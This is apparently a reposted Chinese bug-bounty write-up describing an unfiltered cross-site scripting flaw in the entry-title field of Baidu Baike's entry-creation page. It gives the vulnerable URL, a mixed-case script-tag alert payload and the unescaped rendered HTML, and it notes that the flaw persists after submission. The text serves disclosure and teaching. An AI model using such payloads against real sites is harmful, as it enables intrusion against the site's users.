往年公开:实战src挖掘 XX漏洞挖掘(一、XX词条)
2023-12-31 16:6:1 Author: Ots安全(查看原文) 阅读量:27 收藏

发现方式:XX创建词条,然后标题处存在xss漏洞

漏洞链接 :

https://baike.baidu.com/page/createindex?lemmaTitle=


这里可以直接插入xss代码,或者链接后插入

https://baike.baidu.com/page/createindex?lemmaTitle=<sCriPt>alert(/xss/)</sCripT>/


 然后呢,点击浏览,会弹出。标题是没有经过任何的过滤的


看下,代码

<h1 ><sCriPt>alert(/xss/)</sCripT></h1>


是没有任何过滤和限制的,。

然后在提交一下,在我的词条处点击查看,还是会弹窗,证明词条标题处是没有过滤的

https://baike.baidu.com/usercenter/lemmas#auditing



转载至:https://codeantenna.com/a/TrDWBWRDkV

文章作者:白昼小丑

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503545&idx=1&sn=773054826482110c15006f1f7b922747&chksm=9af7080cab8c7aa1731e12afecad213139eeb1b29fb58c59640a77d3b3da16a2eaef667dbd5c&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh